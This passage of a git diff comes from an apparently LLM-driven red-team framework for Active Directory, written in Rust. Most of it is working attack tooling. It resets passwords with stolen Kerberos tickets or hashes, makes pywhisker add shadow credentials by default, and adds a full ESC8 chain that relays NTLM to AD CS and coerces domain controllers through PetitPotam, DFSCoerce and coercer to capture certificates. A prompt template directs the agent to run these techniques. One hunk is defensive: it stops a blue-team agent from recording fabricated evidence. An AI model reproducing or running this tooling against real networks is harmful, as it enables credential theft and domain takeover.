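}

fn main() {
    let from_llm = json!({"target": "192.168.58.10", "username": "alice", "password": "guessed"});
    let auth = AuthMaterial::NtlmHash("b8d76e56e9dac90539aff05e3ccb1755".into());
    let resolved = inject_credentials(from_llm, &auth);
    assert_eq!(resolved["hash"], "b8d76e56e9dac90539aff05e3ccb1755");
    assert!(resolved.get("password").is_none());
}
```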
diff --git a/ares-llm/templates/redteam/tasks/recon.md.tera b/ares-llm/templates/redteam/tasks/recon.md.tera
index c3f7d589..625a96e9 100644
--- a/ares-llm/templates/redteam/tasks/recon.md.tera
+++ b/ares-llm/templates/redteam/tasks/recon.md.tera
@@ -3,15 +3,31 @@
 **Target:** {{ target_ip }}
 {% if domain %}**Domain:** {{ domain }}
 {% endif -%}
-{% if credential_username %}**Credential:** {{ credential_username }}@{{ credential_domain }}{% if credential_password %} / Password: {{ credential_password }}{% endif %}
+{% if credential_username %}**Principal:** {{ credential_username }}@{{ credential_domain }} (auth: {{ credential_auth_type }} — auto-resolved at dispatch, do NOT pass password/hash/ticket fields)
+{% endif -%}
+{% if bind_domain %}**Bind Domain:** {{ bind_domain }} (use bind_domain={{ bind_domain }} in ldap_search when credential domain differs from target domain)
 {% endif -%}
+{% if technique -%}
+**Technique:** {{ technique }}
+{% endif -%}
 {% if techniques -%}
 **Requested Techniques:**
 {% for t in techniques -%}
 - {{ t }}
 {% endfor -%}
-{% else -%}
+{% endif -%}
+{% if has_ntlm_hash -%}
+**NTLM Hash available** (auto-resolved at dispatch — do NOT pass `nthash`/`hashes` fields){% if hash_username %} for user: {{ hash_username }}{% endif %}
+{% endif -%}
+
+{% if instructions -%}
+## Instructions
+
+**IMPORTANT: Follow these instructions exactly. Do NOT perform generic scanning — execute only the specific technique described below.**
+
+{{ instructions }}
+{% elif not techniques -%}
 Perform a comprehensive reconnaissance scan of the target.
 {% endif -%}
diff --git a/ares-tools/Cargo.toml b/ares-tools/Cargo.toml
index b519596b..9ecbbeff 100644
--- a/ares-tools/Cargo.toml
+++ b/ares-tools/Cargo.toml
@@ -17,6 +17,7 @@ uuid = { workspace = true }
 regex = { workspace = true }
 redis = { workspace = true }
 tempfile = "3"
+base64 = "0.22"

 [features]
 default = ["blue"]
diff --git a/ares-tools/src/acl.rs b/ares-tools/src/acl.rs
index 48c239cd..3ba75f07 100644
--- a/ares-tools/src/acl.rs
+++ b/ares-tools/src/acl.rs
@@ -50,26 +50,52 @@ pub async fn bloodyad_add_group_member(args: &Value) -> Result<ToolOutput> {

 /// Set a user's password via `bloodyAD set password`.
 ///
-/// Required args: `domain`, `username`, `password`, `dc_ip`, `target_user`, `new_password`
+/// Required args: `domain`, `dc_ip`, `target_user`, `new_password`
+/// Auth — one of:
+/// - `username` + `password` (plaintext NTLM bind)
+/// - `ticket_path` (Kerberos ccache path; bloodyAD `-k -K <ccache>`)
+///
+/// When `ticket_path` is provided it takes precedence over password/hash.
+/// The env var `KRB5CCNAME` is set to the path so bloodyAD's Kerberos stack
+/// picks it up without a separate `kinit` step.
 pub async fn bloodyad_set_password(args: &Value) -> Result<ToolOutput> {
     let domain = required_str(args, "domain")?;
-    let username = required_str(args, "username")?;
-    let password = required_str(args, "password")?;
     let dc_ip = required_str(args, "dc_ip")?;
     let target_user = required_str(args, "target_user")?;
     let new_password = required_str(args, "new_password")?;
-
-    let creds = credentials::bloodyad_creds(domain, username, password, dc_ip);
-
-    CommandBuilder::new("bloodyAD")
-        .args(creds)
-        .arg("set")
-        .arg("password")
-        .arg(target_user)
-        .arg(new_password)
-        .timeout_secs(60)
-        .execute()
-        .await
+    let ticket_path = optional_str(args, "ticket_path").filter(|s| !s.is_empty());
+
+    if let Some(tpath) = ticket_path {
+        // Kerberos mode: bloodyAD -d <domain> --host <dc_ip> -k -K <ccache>
+        CommandBuilder::new("bloodyAD")
+            .flag("-d", domain)
+            .flag("--host", dc_ip)
+            .arg("-k")
+            .flag("-K", tpath.to_string())
+            .arg("set")
+            .arg("password")
+            .arg(target_user)
+            .arg(new_password)
+            // KRB5CCNAME must also be set as an env var; some bloodyAD
+            // versions read it even when -K is passed.
+            .env("KRB5CCNAME", tpath)
+            .timeout_secs(60)
+            .execute()
+            .await
+    } else {
+        let username = required_str(args, "username")?;
+        let password = required_str(args, "password")?;
+        let creds = credentials::bloodyad_creds(domain, username, password, dc_ip);
+        CommandBuilder::new("bloodyAD")
+            .args(creds)
+            .arg("set")
+            .arg("password")
+            .arg(target_user)
+            .arg(new_password)
+            .timeout_secs(60)
+            .execute()
+            .await
+    }
 }

 /// Grant GenericAll rights via `bloodyAD add genericAll`.
@@ -152,14 +178,14 @@ pub async fn gmsa_read_password_bloodyad(args: &Value) -> Result<ToolOutput> {
 /// Manipulate msDS-KeyCredentialLink via `pywhisker.py`.
 ///
 /// Required args: `domain`, `username`, `password`, `dc_ip`, `target_samaccountname`
-/// Optional args: `action` (default: `"list"`)
+/// Optional args: `action` (default: `"add"`)
 pub async fn pywhisker(args: &Value) -> Result<ToolOutput> {
     let domain = required_str(args, "domain")?;
     let username = required_str(args, "username")?;
     let password = required_str(args, "password")?;
     let dc_ip = required_str(args, "dc_ip")?;
     let target_sam = required_str(args, "target_samaccountname")?;
-    let action = optional_str(args, "action").unwrap_or("list");
+    let action = optional_str(args, "action").unwrap_or("add");

     CommandBuilder::new("pywhisker")
         .flag("-d", domain)
@@ -167,7 +193,7 @@ pub async fn pywhisker(args: &Value) -> Result<ToolOutput> {
         .flag("-p", password)
         .flag("--target", target_sam)
         .flag("--action", action)
-        .flag("-dc-ip", dc_ip)
+        .flag("--dc-ip", dc_ip)
         .timeout_secs(120)
         .execute()
         .await
@@ -267,7 +293,7 @@ pub async fn dacl_edit(args: &Value) -> Result<ToolOutput> {
     let target_dn = required_str(args, "target_dn")?;
     let action = optional_str(args, "action").unwrap_or("write");

-    let target = credentials::impacket_target(Some(domain), username, Some(password), domain);
+    let target = credentials::impacket_target(Some(domain), username, Some(password), dc_ip);

     CommandBuilder::new("dacledit.py")
         .flag("-action", action)
@@ -503,8 +529,8 @@ mod tests {
            "dc_ip": "192.168.58.10",
            "target_samaccountname": "dc01$"
        });
-        let action = optional_str(&args, "action").unwrap_or("list");
-        assert_eq!(action, "list");
+        let action = optional_str(&args, "action").unwrap_or("add");
+        assert_eq!(action, "add");
    }

    #[test]
@@ -515,10 +541,10 @@
            "domain": "contoso.local",
            "username": "pwned_user",
            "password": "P@ssw0rd!",
            "dc_ip": "192.168.58.10",
            "target_samaccountname": "dc01$",
-            "action": "add"
+            "action": "list"
        });
-        let action = optional_str(&args, "action").unwrap_or("list");
-        assert_eq!(action, "add");
+        let action = optional_str(&args, "action").unwrap_or("add");
+        assert_eq!(action, "list");
    }

    #[test]
@@ -837,6 +863,8 @@ mod tests {
        assert_eq!(action_flag, "--AddComputerTask");
    }

+    // --- mock executor tests: exercise full CommandBuilder code paths ---
+
    use crate::executor::mock;

    #[tokio::test]
@@ -859,6 +887,35 @@
        assert!(super::bloodyad_set_password(&args).await.is_ok());
    }

+    #[tokio::test]
+    async fn bloodyad_set_password_kerberos_mode_executes() {
+        // When ticket_path is supplied, bloodyAD should be invoked with -k -K
+        // rather than username/password. This verifies the Kerberos branch of
+        // bloodyad_set_password builds a valid command without erroring out.
+        mock::push(mock::success());
+        let args = json!({
+            "domain": "fabrikam.local",
+            "dc_ip": "192.168.58.20",
+            "target_user": "svc_exploit",
+            "new_password": "NewP@ss!99",
+            "ticket_path": "/tmp/ares-tickets/contoso_local__fabrikam_local__Administrator.ccache"
+        });
+        assert!(super::bloodyad_set_password(&args).await.is_ok());
+    }
+
+    #[tokio::test]
+    async fn bloodyad_set_password_kerberos_missing_creds_still_needs_new_password() {
+        // ticket_path branch still requires new_password.
+        let args = json!({
+            "domain": "fabrikam.local",
+            "dc_ip": "192.168.58.20",
+            "target_user": "svc_exploit",
+            "ticket_path": "/tmp/ares-tickets/contoso_local__fabrikam_local__Administrator.ccache"
+            // new_password deliberately absent
+        });
+        assert!(required_str(&args, "new_password").is_err());
+    }
+
    #[tokio::test]
    async fn bloodyad_add_genericall_executes() {
        mock::push(mock::success());
diff --git a/ares-tools/src/blue/investigation/write.rs b/ares-tools/src/blue/investigation/write.rs
index 7b065f49..35557f66 100644
--- a/ares-tools/src/blue/investigation/write.rs
+++ b/ares-tools/src/blue/investigation/write.rs
@@ -36,13 +36,24 @@ pub async fn add_evidence(args: &Value) -> Result<ToolOutput> {
         )));
     }

-    // Validate evidence against recent query results and adjust confidence
-    let (query_validated, _source_query_id) = evidence_validator::validate_evidence_value(value);
+    // Grounding: refuse to write evidence whose value was not seen in any
+    // recent query result (or is a MITRE technique ID, which auto-validates).
+    // Without this check, an agent could fabricate an IP/user/hash and have it
+    // accepted as evidence — confidence-only penalties don't deter that.
+    let (query_validated, source_query_id) = evidence_validator::validate_evidence_value(value);
+    if !query_validated {
+        return Ok(make_error(&format!(
+            "Evidence rejected: value '{value}' was not found in any recorded query result. \
+             Run a Loki/Prometheus query that returns this value first, then add it as evidence. \
+             Evidence values must be IOCs grounded in observed data, not asserted by the agent."
+        )));
+    }
     let raw_confidence = args
         .get("confidence")
         .and_then(Value::as_f64)
         .unwrap_or(0.5);
     let confidence = evidence_validator::adjust_confidence(raw_confidence, query_validated);
+    let _ = source_query_id;

     // Auto-assign pyramid level from evidence type when caller omits it
     let pyramid_level = optional_str(args, "pyramid_level")
@@ -198,7 +209,17 @@ pub async fn add_evidence_batch(args: &Value) -> Result<ToolOutput> {
             continue;
         }

+        // Grounding: reject items whose value was not seen in any recent
+        // query result (MITRE technique IDs auto-validate inside
+        // `validate_evidence_value`).
         let (query_validated, _) = evidence_validator::validate_evidence_value(value);
+        if !query_validated {
+            validation_errors.push(format!(
+                "item[{i}] {evidence_type}={value}: value not found in any recorded query result \
+                 (run a query returning this IOC before recording it as evidence)"
+            ));
+            continue;
+        }
         let raw_confidence = item
             .get("confidence")
             .and_then(Value::as_f64)
diff --git a/ares-tools/src/coercion.rs b/ares-tools/src/coercion.rs
index 1e1e7901..20deddec 100644
--- a/ares-tools/src/coercion.rs
+++ b/ares-tools/src/coercion.rs
@@ -4,9 +4,16 @@
 //! produced by running the corresponding CLI tool as a subprocess.

 use std::io::Write;
+use std::net::TcpListener;
+use std::path::{Path, PathBuf};
+use std::process::Stdio;
+use std::time::{Duration, Instant};

-use anyhow::Result;
+use anyhow::{Context, Result};
+use base64::Engine;
 use serde_json::Value;
+use tokio::process::{Child, Command as TokioCommand};
+use tokio::time::sleep;

 use crate::args::{optional_bool, optional_str, required_str};
 use crate::executor::CommandBuilder;
@@ -58,6 +65,7 @@ pub async fn coercer(args: &Value) -> Result<ToolOutput> {
         .arg("coerce")
         .flag("-t", target)
         .flag("-l", listener)
+        .arg("--always-continue")
         .timeout_secs(120);

     if let Some(u) = username {
@@ -89,6 +97,7 @@ pub async fn petitpotam(args: &Value) -> Result<ToolOutput> {
         .flag("-t", target)
         .flag("-l", listener)
         .args(["--filter-protocol-name", "MS-EFSR"])
+        .arg("--always-continue")
         .timeout_secs(60);

     if let Some(u) = username {
@@ -116,8 +125,8 @@ pub async fn dfscoerce(args: &Value) -> Result<ToolOutput> {
     let domain = optional_str(args, "domain");

     let mut cmd = CommandBuilder::new("dfscoerce")
-        .flag("-t", target)
-        .flag("-l", listener)
+        .arg(listener)
+        .arg(target)
         .timeout_secs(60);

     if let Some(u) = username {
@@ -133,6 +142,25 @@
     cmd.execute().await
 }

+/// Standalone-relay BUSY response. Standalone `ntlmrelayx_to_*` tools share
+/// the host-wide port 445 (and SOCKS 1080) with `relay_and_coerce`; a second
+/// invocation while one is already in flight crashes with
+/// `OSError [Errno 98] Address already in use`. We acquire the same loopback
+/// sentinel the composite path uses and refuse to race when contended.
+fn relay_busy_output(tool: &str) -> ToolOutput {
+    ToolOutput {
+        stdout: format!(
+            "RELAY_BIND_BUSY\n{tool}: another relay/coerce invocation is active \
+             on this host (loopback port {RELAY_LOCK_PORT} held). Refusing to \
+             race for ntlmrelayx port 445; retry after the in-flight relay \
+             completes."
+        ),
+        stderr: String::new(),
+        exit_code: Some(0),
+        success: false,
+    }
+}
+
 /// Relay captured NTLM authentication to LDAPS for delegation abuse.
 ///
 /// Required args: `dc_ip`
@@ -141,6 +169,11 @@ pub async fn ntlmrelayx_to_ldaps(args: &Value) -> Result<ToolOutput> {
     let dc_ip = required_str(args, "dc_ip")?;
     let delegate_access = optional_bool(args, "delegate_access").unwrap_or(false);

+    let _lock = match try_acquire_relay_lock() {
+        Some(l) => l,
+        None => return Ok(relay_busy_output("ntlmrelayx_to_ldaps")),
+    };
+
     let target_url = format!("ldaps://{dc_ip}");

     CommandBuilder::new("impacket-ntlmrelayx")
@@ -159,6 +192,11 @@
     let ca_host = required_str(args, "ca_host")?;
     let template = optional_str(args, "template");

+    let _lock = match try_acquire_relay_lock() {
+        Some(l) => l,
+        None => return Ok(relay_busy_output("ntlmrelayx_to_adcs")),
+    };
+
     let target_url = format!("http://{ca_host}/certsrv/certfnsh.asp");

     CommandBuilder::new("impacket-ntlmrelayx")
@@ -179,15 +217,850 @@
     let socks = optional_bool(args, "socks").unwrap_or(false);
     let interactive = optional_bool(args, "interactive").unwrap_or(false);

+    let _lock = match try_acquire_relay_lock() {
+        Some(l) => l,
+        None => return Ok(relay_busy_output("ntlmrelayx_to_smb")),
+    };
+
     CommandBuilder::new("impacket-ntlmrelayx")
         .flag("-t", target_ip)
-        .arg_if(socks, "--socks")
+        .arg_if(socks, "-socks")
         .arg_if(interactive, "-i")
         .timeout_secs(120)
         .execute()
         .await
 }

+/// Parsed + validated args for [`relay_and_coerce`]. Pulled into a struct so
+/// the validation logic can be unit-tested without spawning subprocesses.
+#[derive(Debug, Clone, PartialEq, Eq)]
+struct RelayCoerceConfig {
+    ca_host: String,
+    coerce_target: String,
+    attacker_ip: String,
+    coerce_user: Option<String>,
+    coerce_domain: String,
+    coerce_secret: Option<CoerceSecret>,
+    template: String,
+}
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+enum CoerceSecret {
+    Hash(String),
+    Password(String),
+}
+
+fn parse_relay_coerce_args(args: &Value) -> Result<RelayCoerceConfig> {
+    let ca_host = required_str(args, "ca_host")?;
+    // Accept legacy `target_dc` as an alias for backwards compat with state
+    // injected before the rename.
+    let coerce_target = optional_str(args, "coerce_target")
+        .or_else(|| optional_str(args, "target_dc"))
+        .ok_or_else(|| {
+            anyhow::anyhow!("relay_and_coerce: missing required argument 'coerce_target'")
+        })?;
+    let attacker_ip = required_str(args, "attacker_ip")?;
+    let coerce_user = optional_str(args, "coerce_user").filter(|s| !s.is_empty());
+    let coerce_domain = optional_str(args, "coerce_domain").unwrap_or("");
+    let coerce_hash = optional_str(args, "coerce_hash").filter(|s| !s.is_empty());
+    let coerce_password = optional_str(args, "coerce_password").filter(|s| !s.is_empty());
+    let template = optional_str(args, "template").unwrap_or("DomainController");
+
+    // Source ≠ target. Coercing the CA host itself triggers same-machine
+    // NTLM loopback rejection at IIS. Conservative literal compare — callers
+    // mixing hostname/IP across the two args still slip through; it's on the
+    // caller to keep them distinct.
+    if coerce_target == ca_host {
+        anyhow::bail!(
+            "relay_and_coerce: coerce_target ({coerce_target}) must differ from ca_host \
+             ({ca_host}); same-machine NTLM loopback protection blocks relayed auth. \
+             Coerce a different machine account (e.g. another DC) and relay it to this CA."
+        );
+    }
+
+    if coerce_user.is_some() && coerce_hash.is_none() && coerce_password.is_none() {
+        anyhow::bail!(
+            "relay_and_coerce: coerce_user provided without coerce_hash or coerce_password"
+        );
+    }
+
+    // Defensive character check so a stray input can't smuggle a second arg
+    // into a child process via env propagation. Single-quote no longer matters
+    // (no shell), but we keep rejecting it alongside newlines; embedded
+    // newlines or quotes in a hash or hostname are always wrong.
+    for (name, val) in [
+        ("ca_host", ca_host),
+        ("coerce_target", coerce_target),
+        ("attacker_ip", attacker_ip),
+        ("coerce_user", coerce_user.unwrap_or("")),
+        ("coerce_domain", coerce_domain),
+        ("template", template),
+    ] {
+        if val.contains('\n') || val.contains('\'') {
+            anyhow::bail!("{name} contains forbidden character (newline or single-quote)");
+        }
+    }
+
+    let coerce_secret = if let Some(h) = coerce_hash {
+        if h.contains('\n') || h.contains('\'') || h.contains(' ') {
+            anyhow::bail!("coerce_hash contains forbidden character");
+        }
+        Some(CoerceSecret::Hash(h.to_string()))
+    } else if let Some(p) = coerce_password {
+        if p.contains('\n') || p.contains('\'') {
+            anyhow::bail!("coerce_password contains forbidden character");
+        }
+        Some(CoerceSecret::Password(p.to_string()))
+    } else {
+        None
+    };
+
+    Ok(RelayCoerceConfig {
+        ca_host: ca_host.to_string(),
+        coerce_target: coerce_target.to_string(),
+        attacker_ip: attacker_ip.to_string(),
+        coerce_user: coerce_user.map(String::from),
+        coerce_domain: coerce_domain.to_string(),
+        coerce_secret,
+        template: template.to_string(),
+    })
+}
+
+// === Trait-based execution seam =====================================
+//
+// The phase-progression logic (spawn relay → run coerce phases → poll
+// log → extract cert) is exercised by unit tests via FakeCoerceProcs,
+// which scripts subprocess outcomes and relay-log writes. Production
+// uses RealCoerceProcs which wraps tokio::process::{Command,Child}.
+
+trait RelayHandle {
+    fn pid(&self) -> u32;
+    /// Sleep `settle` (giving the process time to bind ports), then check
+    /// whether it has already exited. Returns the exit code if so.
+    async fn settle_then_try_wait(&mut self, settle: Duration) -> Option<i32>;
+    async fn kill_and_wait(&mut self, timeout: Duration);
+}
+
+trait CoerceProcs {
+    type Handle: RelayHandle;
+    fn is_local_ip(&self, ip: &str) -> bool;
+    fn list_local_ips(&self) -> Vec<String>;
+    fn which_binary(&self, name: &str) -> bool;
+    async fn cleanup_stale_listeners(&self, workdir: &Path);
+    async fn spawn_relay(
+        &self,
+        target_url: &str,
+        template: &str,
+        relay_log: &Path,
+        workdir: &Path,
+    ) -> Result<Self::Handle>;
+    async fn run_phase(
+        &self,
+        coerce_log: &Path,
+        header: &str,
+        bin: &str,
+        args: &[&str],
+        cwd: &Path,
+        timeout_secs: u64,
+    );
+}
+
+#[derive(Debug, Clone, Copy)]
+struct RunOptions {
+    relay_settle: Duration,
+    poll_interval: Duration,
+    poll_phase_1: Duration,
+    poll_phase_2: Duration,
+    poll_phase_3: Duration,
+    post_capture_settle: Duration,
+    relay_kill_timeout: Duration,
+    keep_workdir_on_capture: bool,
+    /// Whether to acquire the host-wide TCP-port mutex before spawning the
+    /// relay. Production sets this to `true` to serialize concurrent
+    /// invocations across worker processes; unit tests set `false` so they
+    /// can run in parallel without fighting over the loopback sentinel port.
+    acquire_host_lock: bool,
+}
+
+impl RunOptions {
+    fn production() -> Self {
+        Self {
+            relay_settle: Duration::from_secs(3),
+            poll_interval: Duration::from_millis(500),
+            poll_phase_1: Duration::from_secs(8),
+            poll_phase_2: Duration::from_secs(10),
+            poll_phase_3: Duration::from_secs(8),
+            post_capture_settle: Duration::from_secs(5),
+            relay_kill_timeout: Duration::from_secs(5),
+            keep_workdir_on_capture: true,
+            acquire_host_lock: true,
+        }
+    }
+}
+
+// --- Real (production) implementation -------------------------------
+
+struct RealCoerceProcs;
+
+struct RealRelayHandle {
+    child: Child,
+}
+
+impl RelayHandle for RealRelayHandle {
+    fn pid(&self) -> u32 {
+        self.child.id().unwrap_or(0)
+    }
+
+    async fn settle_then_try_wait(&mut self, settle: Duration) -> Option<i32> {
+        sleep(settle).await;
+        match self.child.try_wait() {
+            Ok(Some(status)) => Some(status.code().unwrap_or(-1)),
+            _ => None,
+        }
+    }
+
+    async fn kill_and_wait(&mut self, timeout: Duration) {
+        let _ = self.child.start_kill();
+        let _ = tokio::time::timeout(timeout, self.child.wait()).await;
+    }
+}
+
+impl CoerceProcs for RealCoerceProcs {
+    type Handle = RealRelayHandle;
+
+    fn is_local_ip(&self, ip: &str) -> bool {
+        use std::net::{IpAddr, UdpSocket};
+        let parsed: IpAddr = match ip.parse() {
+            Ok(addr) => addr,
+            Err(_) => return false,
+        };
+        if parsed.is_loopback() || parsed.is_unspecified() || parsed.is_multicast() {
+            return false;
+        }
+        UdpSocket::bind((parsed, 0)).is_ok()
+    }
+
+    fn list_local_ips(&self) -> Vec<String> {
+        use std::net::UdpSocket;
+        let mut out = Vec::new();
+        if let Ok(sock) = UdpSocket::bind("0.0.0.0:0") {
+            if sock.connect("8.8.8.8:53").is_ok() {
+                if let Ok(local) = sock.local_addr() {
+                    let ip = local.ip().to_string();
+                    if !ip.starts_with("127.") {
+                        out.push(ip);
+                    }
+                }
+            }
+        }
+        out
+    }
+
+    fn which_binary(&self, name: &str) -> bool {
+        let Some(path) = std::env::var_os("PATH") else {
+            return false;
+        };
+        for dir in std::env::split_paths(&path) {
+            if dir.join(name).is_file() {
+                return true;
+            }
+        }
+        false
+    }
+
+    async fn cleanup_stale_listeners(&self, workdir: &Path) {
+        // pkill returns 1 if no match — fine; we want at-most-once semantics,
+        // not strict success. ntlmrelayx surfaces RELAY_BIND_FAILED later if a
+        // non-impacket process is still holding the ports.
+        for pat in [
+            "impacket-ntlmrelayx",
+            "ntlmrelayx.py",
+            "Responder.py",
+            "impacket-petitpotam",
+        ] {
+            let _ = TokioCommand::new("pkill")
+                .arg("-f")
+                .arg(pat)
+                .stdin(Stdio::null())
+                .stdout(Stdio::null())
+                .stderr(Stdio::null())
+                .current_dir(workdir)
+                .status()
+                .await;
+        }
+        sleep(Duration::from_millis(500)).await;
+    }
+
+    async fn spawn_relay(
+        &self,
+        target_url: &str,
+        template: &str,
+        relay_log: &Path,
+        workdir: &Path,
+    ) -> Result<Self::Handle> {
+        let relay_log_out = std::fs::File::create(relay_log).context("create relay.log")?;
+        let relay_log_err = relay_log_out.try_clone().context("dup relay.log fd")?;
+        // ntlmrelayx writes captured PFXs (and BloodHound JSON) relative to its
+        // own CWD. Pin it to the workdir so artifacts land where we can find
+        // them (and not in the worker's `/`). --keep-relaying prevents the
+        // first inbound (often anonymous) connection from causing "All targets
+        // processed!" before the real coerced DC calls back.
+        let child = TokioCommand::new("impacket-ntlmrelayx")
+            .arg("-t")
+            .arg(target_url)
+            .arg("--adcs")
+            .arg("--template")
+            .arg(template)
+            .arg("-smb2support")
+            .arg("--keep-relaying")
+            .arg("--no-da")
+            .arg("--no-acl")
+            .arg("--no-validate-privs")
+            .arg("--no-dump")
+            .current_dir(workdir)
+            .stdin(Stdio::piped())
+            .stdout(Stdio::from(relay_log_out))
+            .stderr(Stdio::from(relay_log_err))
+            .kill_on_drop(true)
+            .spawn()
+            .context("failed to spawn impacket-ntlmrelayx (is it installed?)")?;
+        Ok(RealRelayHandle { child })
+    }
+
+    async fn run_phase(
+        &self,
+        coerce_log: &Path,
+        header: &str,
+        bin: &str,
+        args: &[&str],
+        cwd: &Path,
+        timeout_secs: u64,
+    ) {
+        let mut cmd = TokioCommand::new(bin);
+        for a in args {
+            cmd.arg(a);
+        }
+        cmd.current_dir(cwd).stdin(Stdio::null());
+        let timeout = Duration::from_secs(timeout_secs);
+        match tokio::time::timeout(timeout, cmd.output()).await {
+            Ok(Ok(out)) => append_output(coerce_log, header, &out).await,
+            Ok(Err(e)) => append_error(coerce_log, header, &format!("spawn failed: {e}")).await,
+            Err(_) => {
+                append_error(
+                    coerce_log,
+                    header,
+                    &format!("timed out after {timeout_secs}s"),
+                )
+                .await
+            }
+        }
+    }
+}
+
+/// Composite ESC8 relay+coerce. Starts ntlmrelayx targeting AD CS web
+/// enrollment, coerces a chosen machine account over unauth PetitPotam →
+/// authenticated DFSCoerce → MS-EFSR → MS-RPRN until the relay log shows a
+/// cert capture, then decodes the base64 cert from the log and emits
+/// deterministic `PFX_FILE=` / `RELAYED_USER=` markers for the parser.
+///
+/// Required args: `ca_host`, `coerce_target`, `attacker_ip`.
+/// Optional args: `coerce_user`, `coerce_domain`, `coerce_hash` /
+/// `coerce_password`, `template` (default "DomainController").
+///
+/// **Source ≠ target.** `coerce_target` MUST differ from `ca_host`. When CA
+/// is co-located on the DC (common in lab AD), coercing the same host triggers
+/// Microsoft's same-machine NTLM loopback protection and ADCS rejects the
+/// relayed auth. Coerce a different DC or member instead — e.g. a child-DC
+/// machine account relayed to the parent forest's CA.
+///
+/// Phase 1 always runs unauthenticated PetitPotam (works against unpatched
+/// DCs without creds). Phase 2 runs authenticated DFSCoerce. Phase 3 runs
+/// `coercer` for MS-EFSR / MS-RPRN. Phases 2/3 are skipped when no creds
+/// are supplied.
+pub async fn relay_and_coerce(args: &Value) -> Result<ToolOutput> {
+    let cfg = parse_relay_coerce_args(args)?;
+    run_relay_and_coerce(cfg, &RealCoerceProcs, RunOptions::production()).await
+}
+
+/// Host-wide TCP-port mutex. ntlmrelayx binds 0.0.0.0:445 (and 80) globally;
+/// two relay invocations racing on the same host produce
+/// `OSError [Errno 98] Address already in use` and the loser silently fails
+/// to relay anything. The orchestrator dispatches `relay_and_coerce` from
+/// multiple workers (separate processes), so an intra-process Mutex is not
+/// enough — we need cross-process serialization.
+///
+/// Trick: bind a TCP listener to a fixed loopback port (41445). The kernel
+/// guarantees only one process can hold the port at a time, and releases it
+/// automatically when the listener is dropped or the process dies. No file
+/// cleanup required, no stale-lock races. Hold the returned listener for the
+/// lifetime of the relay; drop it (implicitly) to release.
+const RELAY_LOCK_PORT: u16 = 41445;
+
+#[cfg(test)]
+thread_local! {
+    /// When set on a test thread, [`try_acquire_relay_lock`] uses the real
+    /// host-wide port instead of bypassing it. The contention test sets this
+    /// so its assertion that a held port returns `None` still works; all other
+    /// tests leave it false so they don't fight over the single port.
+    static USE_REAL_RELAY_LOCK_IN_TEST: std::cell::Cell<bool> =
+        const { std::cell::Cell::new(false) };
+}
+
+fn try_acquire_relay_lock() -> Option<TcpListener> {
+    #[cfg(test)]
+    {
+        // Default test behavior: bind to an ephemeral loopback port so tests
+        // never contend on the single host-wide sentinel. Tests that need to
+        // exercise contention semantics opt in via USE_REAL_RELAY_LOCK_IN_TEST.
+        if !USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.get()) {
+            return TcpListener::bind("127.0.0.1:0").ok();
+        }
+    }
+    use std::net::SocketAddr;
+    let addr: SocketAddr = ([127, 0, 0, 1], RELAY_LOCK_PORT).into();
+    TcpListener::bind(addr).ok()
+}
+
+async fn run_relay_and_coerce<P: CoerceProcs>(
+    cfg: RelayCoerceConfig,
+    procs: &P,
+    opts: RunOptions,
+) -> Result<ToolOutput> {
+    // attacker_ip MUST be one of our local interface IPs. The LLM has been
+    // observed to misread context and pass a *target* host (e.g. DC01)
+    // as the attacker IP, which makes the relay listener bind to 0.0.0.0 but
+    // PetitPotam tells the coerced DC to authenticate back to the wrong host
+    // — auth never reaches the relay. Fail fast with a clear error.
+    if !procs.is_local_ip(&cfg.attacker_ip) {
+        anyhow::bail!(
+            "relay_and_coerce: attacker_ip ({}) is not a local interface IP. \
+             Pass the listener_ip / attacker_ip exactly as supplied by the \
+             orchestrator payload — this MUST be the attacker host's IP \
+             (where the relay listener binds), NOT a target machine. \
+             Available local IPs: {}",
+            cfg.attacker_ip,
+            procs.list_local_ips().join(", "),
+        );
+    }
+
+    // Acquire the host-wide relay lock BEFORE any teardown of stale listeners.
+    // If another relay_and_coerce invocation is in flight on this host, refuse
+    // immediately with RELAY_BIND_BUSY rather than racing it for port 445 and
+    // both losing — the dispatcher's dedup will retry on the next tick.
+    //
+    // Must come before `cleanup_stale_listeners`; otherwise we'd pkill the
+    // in-flight peer's ntlmrelayx and corrupt its capture mid-flight.
+    //
+    // The listener is held in `_relay_lock` so the kernel keeps the port bound
+    // for the whole function body. Drop on return automatically releases it.
+    let _relay_lock = if opts.acquire_host_lock {
+        match try_acquire_relay_lock() {
+            Some(l) => Some(l),
+            None => {
+                return Ok(ToolOutput {
+                    stdout: format!(
+                        "RELAY_BIND_BUSY\nAnother relay_and_coerce is active on this \
+                         host (loopback port {RELAY_LOCK_PORT} held). Refusing to race \
+                         for ntlmrelayx port 445; retry after the in-flight relay \
+                         completes."
+                    ),
+                    stderr: String::new(),
+                    exit_code: Some(0),
+                    success: false,
+                });
+            }
+        }
+    } else {
+        None
+    };
+
+    let tempdir = tempfile::Builder::new()
+        .prefix("ares_relay_")
+        .tempdir()
+        .context("failed to create relay workdir")?;
+    let workdir = tempdir.path().to_path_buf();
+    let relay_log = workdir.join("relay.log");
+    let coerce_log = workdir.join("coerce.log");
+
+    procs.cleanup_stale_listeners(&workdir).await;
+
+    let target_url = format!("http://{}/certsrv/certfnsh.asp", cfg.ca_host);
+    let mut relay = procs
+        .spawn_relay(&target_url, &cfg.template, &relay_log, &workdir)
+        .await?;
+
+    // Give it a moment to bind ports; if it died, surface RELAY_BIND_FAILED.
+    if let Some(code) = relay.settle_then_try_wait(opts.relay_settle).await {
+        let log = tokio::fs::read_to_string(&relay_log)
+            .await
+            .unwrap_or_default();
+        return Ok(ToolOutput {
+            stdout: format!("RELAY_BIND_FAILED\n{log}"),
+            stderr: String::new(),
+            exit_code: Some(code),
+            success: false,
+        });
+    }
+
+    let mut summary = format!("RELAY_PID={}\n", relay.pid());
+    let mut captured_via: Option<&'static str> = None;
+
+    // --- Phase 1: unauthenticated PetitPotam ---
+    // Distros differ: Kali ships `petitpotam` (symlink), pip ships
+    // `impacket-petitpotam`. Try in order, log if both missing.
+    summary.push_str("=== Phase 1: unauth PetitPotam ===\n");
+    let petit_bin = ["petitpotam", "impacket-petitpotam"]
+        .into_iter()
+        .find(|b| procs.which_binary(b))
+        .unwrap_or("petitpotam");
+    // PetitPotam positional args are `target path` (where `target` is the
+    // machine being coerced and `path` is the UNC the target authenticates
+    // back to). Reversing them coerces the attacker host onto itself.
+    let unc_path = format!("\\\\{}\\share\\x", cfg.attacker_ip);
+    let p1_args: [&str; 2] = [cfg.coerce_target.as_str(), unc_path.as_str()];
+    procs
